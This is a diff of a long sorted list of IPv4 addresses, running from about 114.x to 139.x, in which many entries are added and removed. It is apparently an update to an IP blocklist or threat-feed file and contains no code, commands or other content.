-114.227.15.106
-114.227.183.225
-114.227.30.128
-114.227.55.26
-114.227.61.22
-114.228.173.143
-114.228.190.191
-114.228.203.4
-114.228.236.152
-114.239.126.179
-114.239.134.7
-114.239.159.177
+114.227.113.49
+114.227.133.33
+114.227.35.93
+114.227.60.42
+114.228.190.53
+114.228.68.180
+114.238.123.219
+114.238.198.167
+114.238.62.239
+114.239.100.160
+114.239.116.243
+114.239.142.12
 114.239.165.14
-114.239.210.76
-114.239.217.81
+114.239.166.157
 114.239.27.216
-114.242.200.61
+114.239.33.231
+114.239.36.126
+114.239.73.31
+114.239.74.26
+114.239.75.105
+114.239.89.135
+114.239.89.207
+114.242.38.20
 114.246.242.57
-114.25.128.214
+114.253.19.196
+114.27.80.145
+114.32.1.46
+114.32.125.127
 114.32.142.38
-114.32.250.37
-114.33.157.94
+114.32.19.113
+114.32.191.1
 114.33.254.154
-114.35.34.12
-114.35.52.89
-114.44.131.199
+114.33.56.178
+114.34.121.242
+114.34.145.40
+114.34.185.127
+114.34.66.190
+114.34.95.216
+114.36.135.150
+114.44.122.162
 114.69.249.194
-114.79.147.37
-115.114.40.105
+114.79.133.79
+114.96.76.62
 115.133.237.163
-115.135.119.202
-115.135.13.133
-115.144.5.228
-115.160.19.171
-115.166.142.18
+115.159.71.193
 115.186.58.49
 115.2.24.182
-115.21.208.183
-115.22.38.59
+115.21.208.103
 115.220.13.22
-115.227.19.195
-115.23.23.91
-115.23.23.94
-115.231.255.174
-115.238.143.230
+115.23.23.103
 115.238.146.138
 115.240.206.206
 115.241.167.123
 115.241.38.13
 115.241.45.18
 115.241.47.18
+115.245.120.238
 115.245.195.210
-115.246.222.92
-115.248.4.85
-115.28.177.49
-115.30.10.190
-115.56.236.90
+115.247.182.238
+115.247.46.122
+115.46.88.68
+115.62.145.24
+115.68.111.56
+115.68.142.36
+115.77.105.26
+115.77.97.146
 115.79.35.110
 115.85.80.74
-115.90.111.174
 115.91.85.43
 115.95.180.244
-115.97.255.48
+116.103.226.20
 116.103.228.163
 116.103.228.37
-116.103.228.69
+116.103.228.93
 116.103.229.113
-116.105.210.22
-116.113.17.210
-116.114.94.30
 116.119.116.212
-116.122.255.108
-116.131.151.186
-116.148.185.51
-116.153.1.110
+116.121.223.115
+116.131.135.206
+116.131.166.26
+116.132.123.22
+116.132.42.170
+116.132.93.38
+116.14.228.232
+116.141.105.6
+116.147.37.225
 116.153.70.111
+116.169.117.6
+116.169.59.68
+116.181.18.35
 116.193.159.2
 116.196.120.195
 116.204.171.29
 116.204.181.43
 116.204.182.156
-116.212.109.131
-116.213.36.178
-116.236.118.194
-116.236.142.18
-116.236.187.4
+116.204.182.53
+116.212.135.137
+116.230.112.15
 116.236.232.169
 116.236.41.248
-116.242.69.216
+116.247.96.202
 116.34.72.47
 116.48.143.172
-116.50.42.21
-116.59.25.225
-116.59.25.244
-116.59.27.234
+116.48.150.115
+116.48.150.154
+116.6.56.66
+116.72.19.113
 116.88.225.30
 116.9.120.88
 116.92.213.114
-116.95.38.84
+116.98.164.88
 117.1.29.103
-117.102.68.18
-117.102.82.13
-117.156.228.34
-117.157.119.70
+117.1.29.125
+117.139.90.149
+117.146.36.154
+117.156.196.23
+117.156.236.19
+117.157.87.15
+117.158.155.26
+117.158.163.235
+117.158.56.11
+117.158.60.98
+117.158.73.58
 117.159.174.226
+117.159.68.166
+117.160.252.49
 117.160.3.132
-117.161.45.35
-117.18.13.82
-117.2.142.24
+117.161.75.116
+117.193.126.201
 117.200.61.3
-117.200.77.6
-117.211.11.130
-117.213.181.114
+117.220.10.3
+117.220.9.91
+117.232.107.107
 117.232.123.90
 117.247.185.39
+117.248.248.152
 117.248.250.182
 117.251.103.186
 117.254.187.254
-117.32.249.174
+117.26.73.45
 117.34.95.146
-117.4.152.81
-117.4.246.36
-117.50.183.251
-117.62.58.42
+117.35.207.52
+117.36.158.76
+117.41.165.40
+117.6.207.182
+117.62.115.236
 117.62.85.250
 117.62.89.110
 117.63.111.120
-117.63.79.229
-117.7.231.248
-117.73.13.131
-117.80.170.109
+117.63.112.121
+117.71.53.210
+117.73.10.98
 117.80.178.254
-117.81.238.16
 117.81.93.202
-117.82.153.174
-117.91.204.173
-117.91.219.20
-117.92.165.71
-117.95.157.63
-117.95.192.84
-117.95.199.65
+117.83.51.212
+117.88.47.227
+117.91.147.162
+117.91.233.36
+117.92.113.178
+117.95.180.241
+117.95.210.197
 117.95.244.159
-118.101.192.62
 118.103.233.174
-118.105.186.228
-118.121.205.107
-118.121.57.166
-118.122.252.139
-118.122.38.37
-118.122.74.56
+118.118.234.136
+118.122.38.74
 118.123.105.86
 118.123.105.90
+118.130.190.181
+118.131.175.67
+118.151.209.226
 118.163.113.53
-118.178.186.214
-118.182.76.109
-118.190.244.112
+118.174.79.50
+118.180.208.34
+118.182.32.16
+118.182.79.43
 118.193.106.155
-118.193.32.181
+118.193.16.50
+118.193.32.238
 118.193.32.39
 118.193.56.153
-118.193.56.204
 118.193.56.41
 118.193.57.165
 118.193.58.159
 118.193.58.234
 118.193.59.109
-118.193.59.232
+118.193.59.15
+118.193.62.92
 118.193.65.94
-118.193.72.185
 118.193.72.27
-118.193.72.32
+118.193.72.69
 118.194.234.57
+118.194.247.29
 118.194.250.122
+118.194.250.124
 118.194.250.80
-118.194.251.128
-118.194.252.244
+118.194.251.159
 118.194.253.131
-118.194.253.72
+118.194.253.73
 118.194.253.74
-118.201.229.137
+118.194.254.244
+118.195.131.140
+118.200.42.154
 118.201.79.222
-118.212.69.24
-118.219.197.14
-118.219.54.135
+118.219.233.146
 118.220.252.143
 118.248.36.40
-118.25.58.224
 118.27.5.109
-118.33.138.51
-118.33.24.72
 118.33.73.177
-118.33.82.133
+118.34.117.189
 118.34.128.46
+118.34.149.112
+118.34.180.142
 118.34.67.27
+118.35.35.232
 118.36.15.126
 118.36.155.156
 118.36.69.40
+118.36.90.114
 118.37.157.169
-118.37.164.107
-118.37.5.251
-118.37.84.210
-118.38.150.203
+118.39.137.91
 118.40.101.209
 118.40.122.9
-118.40.248.20
-118.41.204.67
+118.41.128.150
+118.41.204.80
+118.41.204.91
+118.42.23.221
 118.43.162.5
 118.43.95.157
+118.43.98.239
 118.44.118.203
-118.45.205.44
 118.46.80.120
 118.47.143.195
 118.69.161.67
 118.69.55.101
-118.69.77.88
+118.69.82.100
 118.70.126.155
 118.70.134.18
-118.70.155.60
 118.70.170.120
-118.70.178.193
-118.97.98.2
-119.113.54.210
-119.152.254.13
-119.159.234.131
+118.70.180.188
+118.70.48.219
+118.70.49.114
+118.79.96.155
+118.99.213.105
+119.116.224.237
+119.12.232.157
 119.160.107.144
-119.160.197.178
+119.160.166.237
 119.165.129.11
 119.167.219.132
-119.18.48.19
+119.178.240.238
+119.18.48.48
 119.18.55.47
-119.188.125.179
+119.180.28.27
+119.181.66.221
+119.187.60.219
 119.188.168.53
-119.192.7.85
-119.192.8.27
+119.191.247.19
+119.192.244.176
 119.193.69.250
 119.193.97.24
 119.195.176.185
 119.195.57.228
+119.195.89.240
+119.196.208.126
+119.196.36.182
 119.199.165.150
-119.199.245.111
 119.199.93.221
-119.2.50.243
 119.202.128.28
+119.203.143.84
 119.203.35.16
+119.204.201.15
 119.205.98.232
-119.206.176.111
-119.224.64.167
-119.23.250.61
-119.23.79.1
+119.206.6.108
+119.207.188.62
 119.236.218.94
 119.252.143.6
-119.254.232.206
 119.28.105.34
 119.28.156.200
 119.28.161.236
 119.28.233.240
-119.29.80.42
+119.28.4.87
+119.29.156.110
+119.29.231.234
 119.36.113.143
-119.45.125.59
-119.5.157.124
-119.56.135.155
-119.7.135.20
-119.73.179.114
+119.4.250.94
+119.40.84.148
+119.42.54.4
+119.62.184.202
+119.62.212.164
+119.62.212.184
 119.8.180.84
 119.82.135.226
+119.84.126.15
 119.84.146.21
-119.92.70.82
 119.96.175.9
-119.97.224.6
+119.96.200.230
 12.156.67.18
-12.172.110.78
-12.206.27.250
-120.138.119.75
+12.207.244.211
+12.251.130.22
+120.157.111.147
 120.157.34.136
+120.193.95.245
 120.195.26.106
 120.195.31.102
-120.196.119.158
-120.198.45.52
-120.201.250.44
+120.198.240.140
+120.201.248.6
 120.202.149.117
-120.211.137.186
-120.211.137.29
-120.211.157.123
-120.211.46.212
-120.211.60.176
-120.211.65.169
-120.211.66.40
-120.232.250.221
-120.238.177.235
+120.204.196.162
+120.208.103.108
+120.211.101.25
+120.211.103.225
+120.211.110.84
+120.211.131.10
+120.211.137.27
+120.234.221.22
+120.236.243.133
+120.237.206.76
+120.237.228.182
 120.238.203.2
 120.238.32.253
 120.238.71.252
+120.253.26.219
 120.253.69.172
 120.253.69.251
-120.27.162.88
 120.28.109.188
-120.29.225.101
-120.29.225.102
-120.29.225.103
-120.29.225.104
-120.29.225.105
-120.29.225.106
-120.29.225.107
-120.29.225.108
-120.29.225.109
 120.29.226.5
-120.33.205.162
 120.48.46.225
-120.52.139.130
-120.71.199.46
-120.76.102.125
+120.48.75.148
+120.76.96.170
+120.77.11.27
 120.77.183.19
-120.88.46.226
-120.89.98.72
-120.92.137.214
-121.120.198.9
+120.79.225.204
+120.79.48.81
+121.120.208.84
 121.120.213.7
-121.120.215.62
 121.120.220.61
-121.120.53.58
-121.120.53.7
-121.123.88.218
+121.120.32.46
+121.120.43.54
+121.120.43.82
 121.125.84.184
-121.126.37.211
+121.127.233.239
 121.127.234.213
-121.127.249.161
-121.127.249.162
+121.128.205.163
+121.128.59.241
 121.129.93.181
-121.131.235.203
-121.132.105.1
-121.133.14.249
+121.131.175.118
 121.133.22.1
 121.134.145.252
 121.134.203.4
-121.135.252.191
-121.136.127.58
+121.135.231.227
+121.135.254.129
+121.136.154.157
 121.136.227.217
+121.137.74.48
+121.142.153.17
 121.142.87.218
+121.142.92.83
 121.143.141.79
+121.143.172.78
 121.144.134.14
 121.145.56.179
 121.146.142.226
+121.146.4.161
 121.147.66.199
-121.148.143.194
-121.149.54.8
-121.149.90.88
-121.150.149.190
-121.152.26.222
+121.149.131.49
+121.149.194.35
+121.150.14.172
+121.151.29.47
+121.153.235.161
 121.154.12.74
+121.154.155.80
 121.154.36.235
-121.155.231.244
 121.155.66.24
-121.158.10.146
-121.158.172.228
 121.158.70.160
-121.160.204.106
+121.159.207.63
+121.159.48.198
+121.159.55.237
 121.161.122.176
 121.163.241.214
 121.165.110.194
 121.165.242.205
 121.166.2.253
-121.166.20.186
+121.167.152.1
+121.167.229.91
+121.168.123.179
 121.168.34.211
+121.169.150.161
 121.170.189.137
-121.170.2.9
-121.171.172.213
-121.173.240.184
+121.172.147.104
 121.173.251.86
-121.174.211.215
 121.176.105.114
 121.177.255.178
-121.178.15.232
 121.178.34.146
-121.178.56.87
 121.179.69.134
 121.18.89.174
-121.180.100.2
 121.181.14.46
-121.183.93.202
+121.183.243.190
+121.183.37.173
+121.185.153.152
 121.186.175.215
-121.187.191.84
+121.186.6.200
+121.186.71.183
 121.187.229.137
+121.188.160.55
 121.189.179.69
-121.190.204.208
-121.190.22.245
 121.191.176.29
 121.191.182.179
-121.196.226.61
-121.199.4.177
 121.2.72.105
+121.200.55.147
 121.201.125.236
-121.202.193.65
-121.202.194.65
-121.202.195.22
-121.202.197.165
-121.202.198.167
-121.202.203.182
-121.202.203.33
-121.202.205.248
+121.202.195.9
+121.202.202.254
+121.202.205.117
 121.204.164.111
-121.206.49.12
+121.205.4.44
+121.224.157.221
+121.224.215.54
 121.224.38.4
 121.224.77.157
-121.226.140.152
+121.226.153.201
+121.226.158.99
 121.226.253.176
-121.227.86.20
-121.228.124.60
+121.227.104.53
+121.227.238.252
+121.227.70.200
+121.227.87.228
 121.228.133.74
 121.228.15.40
-121.228.151.243
-121.228.162.133
-121.230.163.245
+121.229.149.80
 121.230.46.162
-121.231.144.3
 121.231.155.219
 121.231.174.121
 121.231.195.204
-121.234.137.172
-121.234.175.211
+121.231.247.128
+121.231.73.32
+121.231.84.117
+121.231.92.82
+121.233.184.207
+121.233.211.179
+121.233.85.34
+121.234.160.16
+121.234.202.116
+121.234.229.132
 121.234.245.37
-121.236.42.131
-121.236.70.171
-121.238.199.228
-121.239.104.51
+121.236.25.21
+121.236.42.119
+121.236.75.118
+121.237.255.190
+121.238.197.188
 121.239.117.11
+121.239.166.36
 121.239.197.232
-121.239.223.43
+121.239.205.201
 121.239.31.26
-121.239.33.62
 121.241.227.91
 121.244.90.125
 121.254.93.188
-121.26.142.238
-121.31.210.14
-121.36.241.28
-121.4.195.240
-121.4.33.86
-121.4.58.7
+121.26.0.106
 121.40.187.73
+121.40.50.132
+121.41.103.129
+121.42.10.239
+121.46.20.126
 121.46.25.182
-121.5.159.172
-121.52.222.17
+121.5.90.216
 121.66.124.146
-121.66.144.140
-121.66.144.142
+121.66.124.147
 121.83.122.242
+121.9.255.182
 122.11.169.112
 122.11.177.164
 122.114.110.57
+122.114.197.7
 122.114.77.98
-122.116.13.161
-122.116.47.137
-122.116.5.34
-122.117.51.33
+122.116.195.77
+122.116.60.196
 122.117.70.129
 122.129.112.102
-122.136.195.68
 122.139.165.122
 122.139.63.134
-122.14.197.21
 122.14.211.172
+122.14.214.24
+122.14.250.28
+122.15.223.149
+122.15.40.164
 122.151.19.88
-122.151.30.86
 122.154.156.234
-122.154.48.30
+122.154.253.5
 122.155.0.205
 122.155.223.224
-122.160.113.184
-122.160.119.125
+122.156.253.66
+122.159.7.88
+122.160.115.70
+122.160.128.150
 122.160.133.86
-122.160.140.145
+122.160.139.59
 122.160.200.22
-122.160.25.225
-122.160.30.113
+122.160.221.36
+122.160.36.121
+122.160.37.45
 122.160.4.11
-122.160.53.132
+122.160.50.155
 122.160.57.233
-122.160.59.87
-122.160.85.3
-122.161.160.22
-122.163.177.126
-122.164.8.171
-122.165.169.113
+122.160.58.201
+122.160.68.26
+122.160.95.45
+122.163.127.64
+122.163.127.86
+122.165.220.183
+122.165.241.233
 122.165.62.224
-122.166.124.116
-122.166.191.51
-122.166.251.98
+122.165.73.253
+122.166.156.246
 122.167.187.87
-122.168.196.31
-122.168.197.165
-122.168.198.143
-122.169.102.160
+122.168.125.191
+122.168.126.113
+122.168.194.41
 122.169.103.121
-122.169.113.61
-122.169.117.70
+122.169.115.216
 122.169.61.21
-122.170.104.102
+122.169.97.231
+122.170.10.27
 122.170.105.73
-122.170.119.242
-122.170.97.80
-122.170.99.81
-122.175.34.207
+122.170.2.112
+122.170.97.94
+122.176.112.52
 122.176.16.178
-122.176.20.63
-122.176.30.182
+122.176.20.226
 122.176.34.226
+122.176.45.238
+122.176.51.43
 122.176.52.13
 122.176.56.84
 122.176.75.86
-122.176.79.197
+122.176.80.82
+122.176.85.162
+122.179.129.110
+122.179.130.147
 122.180.144.243
 122.180.154.126
-122.180.20.201
-122.180.243.249
 122.180.251.123
 122.180.251.164
-122.180.84.226
-122.184.65.226
-122.187.186.235
+122.180.254.179
+122.180.84.160
+122.186.252.110
+122.187.224.114
 122.187.224.226
 122.187.224.251
 122.187.225.220
 122.187.225.26
-122.187.225.42
 122.187.225.49
+122.187.225.72
 122.187.226.13
 122.187.226.14
 122.187.226.16
 122.187.226.21
 122.187.226.240
-122.187.226.4
-122.187.226.67
+122.187.227.136
 122.187.227.138
 122.187.227.140
 122.187.227.148
 122.187.227.166
-122.187.227.168
+122.187.227.167
 122.187.227.190
-122.187.227.193
-122.187.227.195
-122.187.227.199
-122.187.227.233
 122.187.227.24
-122.187.227.240
-122.187.228.229
-122.187.228.233
-122.187.229.10
-122.187.229.161
-122.187.229.228
+122.187.228.228
+122.187.229.104
+122.187.229.118
+122.187.229.129
+122.187.229.145
+122.187.229.153
+122.187.229.78
+122.187.229.82
+122.187.230.10
+122.187.230.132
+122.187.230.133
+122.187.230.148
 122.187.230.156
-122.187.230.184
+122.187.230.165
+122.187.230.170
+122.187.230.181
+122.187.230.198
+122.187.230.223
+122.187.230.243
+122.187.230.250
 122.187.230.251
+122.187.230.36
+122.187.230.57
 122.187.230.90
 122.187.231.180
-122.187.231.2
 122.187.234.54
-122.187.235.10
+122.187.238.72
+122.187.239.112
+122.187.239.174
 122.192.157.87
+122.192.9.74
 122.195.215.206
-122.211.138.37
-122.222.113.69
-122.224.3.154
+122.199.66.10
+122.224.164.194
+122.224.222.210
 122.225.203.106
-122.225.55.98
-122.227.34.50
-122.228.142.146
-122.252.246.172
+122.227.52.58
+122.3.192.83
 122.4.70.58
-122.51.230.17
 122.53.133.167
 122.53.57.33
-122.54.166.78
 122.96.31.132
+122.96.31.137
 122.96.31.138
-122.97.229.210
-123.108.169.213
-123.13.198.131
-123.132.252.2
-123.138.199.66
+123.1.189.205
+123.10.230.79
+123.103.127.77
+123.128.245.24
+123.13.237.76
+123.130.225.200
+123.138.101.106
 123.140.114.196
 123.142.3.142
-123.151.146.72
+123.150.229.61
 123.156.226.101
-123.172.48.199
-123.172.80.221
-123.172.80.59
-123.173.105.117
-123.173.86.140
-123.175.157.46
-123.175.48.8
-123.175.52.127
+123.163.52.74
+123.170.238.202
+123.172.82.106
+123.173.4.35
+123.173.6.184
 123.175.98.159
-123.178.140.234
-123.182.241.36
-123.185.149.26
-123.185.66.99
-123.194.52.153
-123.200.17.60
+123.183.207.200
+123.195.105.184
 123.204.226.29
-123.207.99.184
+123.205.159.170
+123.205.58.116
+123.207.35.85
 123.209.210.124
-123.209.70.205
+123.21.36.204
+123.213.137.182
 123.215.113.153
+123.222.97.136
 123.231.217.92
 123.24.206.100
-123.241.184.235
-123.247.101.217
-123.30.140.204
+123.25.30.146
+123.253.162.254
+123.255.251.70
 123.30.149.60
-123.30.149.76
-123.30.187.208
+123.30.157.54
+123.30.249.49
 123.30.98.134
-123.31.29.192
-123.51.149.136
-123.51.245.128
-123.58.205.134
+123.49.41.210
+123.58.197.21
+123.58.205.65
 123.58.207.109
 123.58.216.78
-123.7.78.139
-123.99.199.66
 124.106.104.91
-124.110.52.243
-124.110.62.3
-124.126.16.122
+124.114.149.106
 124.13.161.239
-124.133.0.52
-124.135.126.93
-124.150.239.135
+124.132.142.158
 124.152.181.49
-124.152.181.85
-124.152.55.133
 124.153.134.155
-124.153.165.218
-124.156.134.203
-124.156.2.182
+124.156.202.69
 124.156.238.47
-124.160.96.242
-124.167.20.115
-124.167.21.190
-124.167.21.95
-124.167.244.134
-124.197.70.242
-124.197.87.109
-124.219.88.179
-124.220.6.50
-124.220.96.175
+124.160.67.42
+124.161.102.74
+124.166.246.67
+124.167.20.113
+124.167.20.72
+124.194.74.203
+124.197.96.102
+124.205.25.110
+124.218.218.250
+124.219.149.157
 124.221.247.245
-124.221.73.76
-124.222.117.105
-124.222.124.143
+124.222.10.213
 124.222.53.226
-124.223.174.224
-124.223.194.161
-124.224.82.234
+124.222.69.38
+124.223.114.215
+124.223.7.137
+124.224.82.3
 124.230.124.250
 124.234.179.243
 124.234.183.186
-124.234.198.145
-124.234.203.63
-124.234.224.156
-124.234.234.72
-124.234.246.43
-124.235.169.119
+124.234.192.85
+124.235.169.238
 124.235.174.46
-124.235.218.153
-124.235.243.162
-124.246.71.47
-124.248.194.74
+124.235.240.75
+124.235.248.206
+124.235.63.75
+124.246.86.52
+124.248.67.76
 124.41.217.33
+124.41.225.79
 124.41.240.56
-124.45.46.243
+124.43.70.178
+124.45.27.84
+124.45.61.93
+124.56.66.38
 124.65.227.154
-124.77.89.84
-124.79.245.43
+124.67.121.194
+124.88.217.20
+124.89.83.176
+124.94.119.152
+124.95.132.151
 124.95.156.130
-125.129.142.200
-125.129.82.220
+125.130.254.154
+125.131.142.234
 125.131.90.13
 125.134.168.105
-125.137.117.198
-125.137.230.225
-125.138.16.126
-125.138.203.226
+125.136.203.14
+125.136.94.222
 125.138.98.110
-125.141.139.9
-125.141.46.24
-125.141.72.204
+125.141.231.165
+125.141.28.90
 125.141.84.135
 125.142.239.217
-125.142.85.230
-125.163.160.229
+125.143.128.117
 125.177.207.163
 125.199.218.169
-125.20.55.14
+125.209.73.250
 125.209.85.186
-125.209.98.218
-125.21.120.90
-125.21.146.174
+125.21.59.218
 125.212.217.214
-125.212.218.5
 125.212.231.175
 125.212.233.50
 125.212.235.211
 125.212.251.45
-125.22.177.178
-125.227.199.193
-125.227.25.242
-125.228.241.112
+125.229.176.248
 125.234.252.150
-125.240.27.138
-125.25.172.196
-125.252.82.209
-125.27.251.215
-125.39.182.205
+125.32.155.14
+125.35.109.214
+125.64.209.11
+125.66.243.1
 125.67.125.170
-128.1.32.242
+125.67.61.202
+125.77.106.59
+125.88.231.98
+125.99.173.162
+126.113.24.98
+126.118.196.38
+128.1.248.27
 128.1.39.90
-128.1.42.231
-128.1.44.206
-128.1.79.9
+128.1.40.228
+128.1.48.107
+128.1.61.199
 128.1.91.204
-128.1.91.206
-128.1.91.91
-128.1.91.92
-128.1.91.93
+128.106.165.245
 128.116.134.9
-128.116.144.194
-128.14.128.178
-128.14.133.50
-128.14.137.179
-128.14.137.180
-128.14.137.181
-128.14.137.182
-128.14.141.34
-128.14.141.35
-128.14.188.107
-128.14.209.42
 128.14.224.132
+128.14.224.248
 128.14.225.196
 128.14.225.218
-128.14.225.243
-128.14.225.250
 128.199.1.140
-128.199.103.239
-128.199.105.162
-128.199.127.220
-128.199.137.99
-128.199.138.145
-128.199.143.230
-128.199.148.70
-128.199.150.10
+128.199.10.70
+128.199.105.111
+128.199.107.58
+128.199.11.223
+128.199.115.248
+128.199.120.146
+128.199.129.68
+128.199.141.33
+128.199.144.161
+128.199.147.56
+128.199.147.72
 128.199.151.172
+128.199.154.5
 128.199.161.227
-128.199.163.55
+128.199.162.2
 128.199.168.119
-128.199.179.8
-128.199.18.232
-128.199.186.230
-128.199.194.183
+128.199.177.224
+128.199.179.36
+128.199.184.157
+128.199.19.74
+128.199.193.246
+128.199.194.1
 128.199.195.68
 128.199.20.210
 128.199.208.187
 128.199.211.78
+128.199.212.70
 128.199.214.193
 128.199.227.110
 128.199.227.165
@@ -1766,2268 +1810,2153 @@
 128.199.227.200
 128.199.227.230
 128.199.227.73
-128.199.227.85
-128.199.227.98
-128.199.23.120
-128.199.234.147
 128.199.24.55
-128.199.247.226
-128.199.33.46
-128.199.34.69
-128.199.38.92
+128.199.30.14
+128.199.32.98
 128.199.45.37
-128.199.49.102
 128.199.5.4
-128.199.61.251
+128.199.52.45
 128.199.62.55
+128.199.68.197
+128.199.70.65
 128.199.71.12
 128.199.73.168
-128.199.80.18
+128.199.77.201
+128.199.77.96
+128.199.80.214
+128.199.91.231
 128.199.95.60
 128.199.96.178
-128.199.96.23
-128.199.97.155
 128.199.97.85
-128.199.98.170
 128.199.98.41
 128.199.99.204
-128.201.108.2
-128.201.78.253
-128.65.52.240
+128.53.4.247
 129.126.119.71
-129.146.145.69
-129.146.242.24
+129.126.211.162
+129.146.183.47
+129.148.44.27
 129.150.180.148
+129.150.51.224
+129.151.119.28
 129.205.208.20
 129.205.98.180
-129.213.100.212
-129.213.50.80
-129.222.250.120
-129.226.158.246
+129.213.108.113
+129.226.164.101
 129.226.171.187
-129.226.198.6
 129.226.201.243
+129.226.205.241
 129.226.207.190
-129.226.210.215
+129.226.209.202
+129.226.209.249
+129.226.210.126
 129.226.211.132
-129.226.214.158
+129.226.211.74
+129.226.213.186
 129.226.214.79
 129.226.215.132
-129.226.220.92
-129.226.222.151
+129.226.215.152
+129.226.217.148
+129.226.221.72
+129.226.221.96
 129.226.55.153
-129.226.83.28
+129.226.83.251
 129.226.83.30
-129.226.89.244
-13.244.220.236
+129.226.95.156
 13.251.240.84
-13.40.123.118
 13.40.127.161
-13.40.147.135
-13.40.25.145
-13.40.6.222
-13.40.98.37
-13.66.131.233
+13.40.33.250
+13.40.55.221
+13.40.8.115
+13.70.39.68
 13.72.228.119
 13.72.86.172
-13.75.73.10
+13.76.162.49
 13.80.7.122
 13.82.51.214
 13.87.204.143
-13.90.192.95
+13.90.16.70
 130.0.90.18
-130.105.45.219
-130.162.212.195
+130.162.42.103
 130.193.42.43
 130.211.218.46
 130.255.145.35
+130.61.177.134
 130.61.35.0
+131.100.151.146
 131.221.200.32
-131.221.81.197
-132.148.120.15
-132.148.165.220
+131.247.10.212
+131.72.220.54
+132.145.30.108
 132.148.76.25
 132.148.77.160
 132.148.85.94
-132.226.112.234
+132.248.14.22
 132.248.204.98
 132.248.65.8
-133.130.103.36
-133.130.89.210
+132.255.230.102
 133.130.99.121
 133.175.60.126
+134.122.106.248
 134.122.17.178
-134.122.23.111
+134.122.174.172
+134.122.19.182
+134.122.206.104
 134.122.34.144
-134.122.39.206
-134.122.49.134
-134.122.63.192
-134.122.72.177
-134.122.74.227
 134.122.8.241
-134.122.89.242
+134.122.91.0
+134.122.92.44
+134.17.16.196
 134.17.16.37
-134.17.16.40
-134.17.16.5
 134.17.17.112
 134.17.89.151
 134.17.89.159
 134.17.89.182
-134.17.94.214
-134.17.94.27
-134.175.229.59
-134.195.198.140
-134.195.239.199
-134.204.0.245
+134.17.94.229
+134.175.48.152
 134.209.101.182
 134.209.103.181
-134.209.110.41
-134.209.127.189
+134.209.149.246
 134.209.153.189
-134.209.153.48
-134.209.154.107
 134.209.154.146
+134.209.175.109
 134.209.179.100
 134.209.183.166
 134.209.197.137
+134.209.200.13
 134.209.216.23
 134.209.226.128
-134.209.23.192
-134.209.231.106
+134.209.227.212
 134.209.254.124
-134.209.255.251
-134.209.65.222
 134.209.69.41
-134.75.253.213
+134.209.8.231
 135.0.208.122
-135.125.163.90
-135.125.224.87
+135.125.202.29
+135.125.68.41
+135.129.137.128
+135.134.153.17
+135.148.121.149
+135.148.13.183
 135.148.236.41
-136.143.205.162
-136.185.11.173
-136.185.2.84
 136.185.7.173
 136.185.8.145
-136.232.185.138
+136.228.161.66
+136.228.161.67
+136.232.180.238
+136.232.194.210
+136.233.33.50
 136.255.147.146
-136.255.154.162
 136.255.154.166
-136.255.230.40
-136.41.160.87
-136.49.165.9
+136.38.1.128
 137.116.148.206
-137.135.12.212
 137.184.0.243
 137.184.104.77
 137.184.106.30
 137.184.112.37
 137.184.124.136
-137.184.125.177
-137.184.144.151
-137.184.148.244
-137.184.150.232
-137.184.162.65
+137.184.144.51
+137.184.145.62
+137.184.164.205
 137.184.176.157
 137.184.184.139
 137.184.200.136
+137.184.216.0
 137.184.217.17
-137.184.222.107
+137.184.217.189
 137.184.222.3
 137.184.225.55
 137.184.226.118
-137.184.226.32
-137.184.239.131
-137.184.255.30
-137.184.255.6
-137.184.35.122
+137.184.255.27
+137.184.255.56
 137.184.35.63
-137.184.35.68
+137.184.37.111
+137.184.37.163
 137.184.4.177
 137.184.5.137
+137.184.5.52
 137.184.50.151
+137.184.50.19
 137.184.55.79
-137.184.6.75
+137.184.73.29
 137.184.78.25
 137.184.80.226
-137.184.81.92
+137.184.94.167
 137.184.95.238
 137.22.34.8
 137.220.244.62
-137.220.244.94
-137.220.38.27
 137.25.229.139
-137.63.148.63
+137.59.94.20
+137.59.95.5
+138.0.147.251
 138.0.55.13
-138.121.163.234
-138.121.2.12
+138.118.176.179
 138.121.65.82
 138.122.143.18
-138.122.201.90
-138.197.102.26
-138.197.151.73
-138.197.160.74
+138.185.193.64
+138.197.132.197
+138.197.141.89
+138.197.151.213
 138.197.167.209
-138.197.169.60
-138.197.175.169
+138.197.176.183
+138.197.176.8
 138.197.177.111
-138.197.180.155
-138.197.19.166
-138.197.20.202
-138.197.4.224
+138.197.20.253
+138.197.24.249
 138.197.66.68
 138.197.88.136
-138.199.34.198
-138.2.10.151
-138.2.235.76
-138.2.24.226
+138.199.60.173
+138.199.60.178
 138.2.56.128
-138.204.192.102
-138.204.69.63
-138.204.70.118
-138.204.70.192
+138.204.69.166
+138.204.71.119
 138.204.71.61
-138.255.113.230
-138.36.129.21
+138.204.71.83
+138.59.233.28
+138.68.102.83
 138.68.103.135
 138.68.106.58
-138.68.128.9
 138.68.133.118
-138.68.143.68
 138.68.153.47
-138.68.163.10
-138.68.208.14
-138.68.208.38
-138.68.208.46
+138.68.162.6
+138.68.208.10
+138.68.208.11
+138.68.208.16
 138.68.208.48
-138.68.208.6
-138.68.208.7
-138.68.226.175
+138.68.208.51
+138.68.208.8
 138.68.230.183
 138.68.239.113
-138.68.55.110
 138.68.58.124
-138.68.63.220
 138.68.71.173
 138.68.74.198
 138.68.8.161
 138.68.9.83
+138.68.9.99
 138.68.91.192
 138.68.93.132
-138.97.194.77
+138.75.117.154
+138.75.222.128
+138.75.246.10
+138.75.84.104
 138.97.64.134
-139.144.110.125
-139.144.110.190
-139.144.110.70
-139.144.150.23
-139.144.150.26
+138.97.96.41
+139.130.88.199
+139.144.110.113
 139.144.150.45
-139.144.150.8
-139.144.239.185
-139.144.239.98
-139.144.4.92
+139.144.176.233
+139.144.239.72
 139.144.52.241
 139.144.96.150
 139.162.190.203
-139.162.191.151
-139.162.204.214
 139.162.60.11
 139.185.46.80
 139.196.123.207
+139.196.153.242
 139.196.242.130
-139.196.94.55
+139.198.116.224
 139.198.120.226
-139.198.163.91
-139.198.32.36
+139.198.14.168
+139.198.19.15
+139.198.33.147
 139.198.35.186
+139.219.9.26
+139.224.230.172
 139.255.54.195
+139.255.90.245
 139.28.218.34
-139.5.17.55
+139.5.241.8
 139.59.0.113
 139.59.10.188
+139.59.104.8
 139.59.105.221
-139.59.113.110
-139.59.121.198
+139.59.126.208
 139.59.127.178
 139.59.129.247
+139.59.136.245
+139.59.14.115
 139.59.16.54
 139.59.175.37
 139.59.182.142
-139.59.182.58
 139.59.184.77
 139.59.188.13
-139.59.189.161
-139.59.226.125
+139.59.215.94
 139.59.23.154
 139.59.23.204
 139.59.230.191
-139.59.231.14
-139.59.242.254
 139.59.248.243
-139.59.25.164
+139.59.250.246
+139.59.251.146
+139.59.252.199
 139.59.254.45
